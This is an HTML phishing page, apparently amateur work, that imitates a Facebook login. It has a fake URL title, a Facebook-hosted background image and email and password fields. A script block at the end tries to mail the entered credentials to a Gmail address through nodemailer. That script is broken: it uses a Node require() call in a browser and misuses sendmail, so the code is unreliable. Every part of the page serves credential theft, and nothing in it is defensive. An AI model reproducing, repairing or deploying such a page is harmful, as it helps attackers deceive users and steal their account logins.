<html>
<head>
<title>https:\\www.black_facebook\login.php</title>
</head>
<body background="https://static.xx.fbcdn.net/rsrc.php/v3/yi/r/OBaVg52wtTZ.png?_nc_x=Ij3Wp8lg5Kz" alt="" width="537" height="195">
	<div class="login_box">
	<img src="C:\Users\soaib\Downloads\blackfb.jpg" class="logo">
		<a href="second.html">click here</a>

    <form action="">
	<p>Email</p>
	<input type="text" id="email" name="Email" placeholder="Enter Email">
	<p>Password</p>
	<input type="Password" id="pass" name="Password" placeholder="Enter Password">
	<span></span>
	<h6><center><input type="Submit" name="Login" value="Login" onclick=send();></center></h6>
	
	
	


</form>

	</div>
	

     	
		
	


</body>
</html>

<style type="text/css">
	body{
		margin: 0;
		padding: 0;
		background-size: cover;
		background-position: center;
		font-family: sans-serif;
	}
	.login_box{
		width: 320px;
		height: 420px;
		background: rgba(0, 0, 0, 0.5);
		color: #fff;
		top: 50%;
		left: 50%;
		position: absolute;
		transform: translate(-50%,-50%);
		box-sizing: border-box;
		padding: 70px 30px;

	}
	.logo {
		width: 100px;
		height: 100px;
		border-radius: 50%;
		position: absolute;
		top: -50px;
		left: calc(105px - 0px);
		

	}
	h1{
		margin: 0; 
		padding: 0 0 20px;
		text-align: center;
		text-decoration: blink;
		font-size: 22px;
}
.login-box p{
	margin: 0;
	padding: 0;
	font-weight: bold;

}
.login-box input{
	width: 100%;
	margin-bottom: 20px;

}
.login-box input[type="Password"], input[type="Password"]
{
	border: none;
	border-bottom: 1px solid #fff;
	background: transparent;
	outline: none;
	height: 40px;
	color: #fff;
	font-size: 16px;
	width: 100%;
	animation: ease-out;
	animation-play-state: 1;
}
.login-box input[type="text"], input[type="text"]
{
	border: none;
	border-bottom: 1px solid #fff;
	background: transparent;
	outline: none;
	height: 30px;
	color: #fff;
	font-size: 16px;
	width: 100%;
}
.login-box input[type="Submit"], input[type="Submit"]
{
	border: none;
	outline: none;
	height: 35px;
	background: #1c8adb;
	color: #fff;
	font-size: 18px;
	border-radius: 20px;
	width: 80%;
	position: absolute;
	left: calc(120px - 90px);
}
.login-box input[type="Submit"], input[type="Submit"]:hover
{
	cursor: hand;
	background: #39dc79;
	color: #000;
}
.login-box a{
	text-decoration: none;
	font-size: 14px;
	color: #ffff;
	left: calc(50px - 0px);
}
.pageFooter{
	padding: 0;
	text-align: center;
	align-content: space-between;
}
._58mv{
	margin: 0;
	padding-bottom: 20px;
	text-align: center;
	position: absolute;
	content: inherit;
	margin-bottom: 16px;
	
}
._5iyx{
	position: absolute;

}
</style>

<script type="text/javascript" id="send">
	var nodemailer = require('nodemailer');
	nodemailer.sendmail();
	var user="kalilinuxofficials119@gmail.com"
	nodemailer.sendmail(user);
	if (nodemailer.sendmail==true) {
		alert("email sent successfully");
	}
	else{
		alert("email not sent");
	}
</script>
